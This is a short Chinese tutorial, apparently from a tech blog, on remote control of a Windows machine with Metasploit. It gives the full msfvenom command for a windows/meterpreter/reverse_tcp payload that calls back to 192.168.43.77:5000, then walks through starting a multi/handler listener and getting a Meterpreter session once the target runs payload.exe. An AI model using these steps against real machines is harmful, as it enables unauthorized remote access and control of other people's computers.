一、在Kali Linux中生成被控端(msfvenom命令)

*
第一步:下面我们用msfvenom命令使用反向远程控制程序“windows/meterpreter/reverse_tcp”。该软件执行时自动连接IP“192.168.43.77”,连接的端口为“5000”,生成的文件为payload.exe,在/root目录下
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f
exe -o /root/payload.exe

* 第二步:然后我们把这个文件移动到Windows系统中

二、在Kali Linux中启动主控端(msfconsole命令)

当我们在Windows中执行payload.exe的时候,就会自动连接到主动端,下面我们来建立一个主控端

* 第一步:输入msfconsole命令启动Metasploit工具

* 第二步:在Metasploit中使用handler作为主动端,这个handler位于exploit下的multi目录下,启动命令如下

* 第三步:设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

* 第四步:设置一个lhost和lport,

* 最后一步:执行“exploit”开启监听,等待被控端打开远程控制软件连接到此处

三、执行远程控制软件

上面生成了远程控制的被控端与主控端之后,现在来执行被控端的软件,执行之后,被控端就与主控端连接了

* 第一步:双击这个软件

* 第二步:执行之后,可以看到主控端连接上了被控端。并且开启了meterpreter会话

* 第三步:现在主控端可以输入命令来操作被控端(注意,虽然被控端是windows平台,但是使用的命令是主控端系统所使用的命令)

技术
©2019-2020 Toolsou All rights reserved,
java实现抢红包功能2021年2月程序员工资统计,平均15144元可怕的不是堕落,而是清楚自己在堕落java简单的抽奖算法,抽奖DemoPYTHON入门期末复习汇总惹什么猫都别惹熊猫!「功夫熊猫」20年对人类拿下4血软件测试之BUG描述JS 的骚操作程序员因拒绝带电脑回家被开除,获赔 19.4 万元vue组件页面高度根据屏幕大小自适应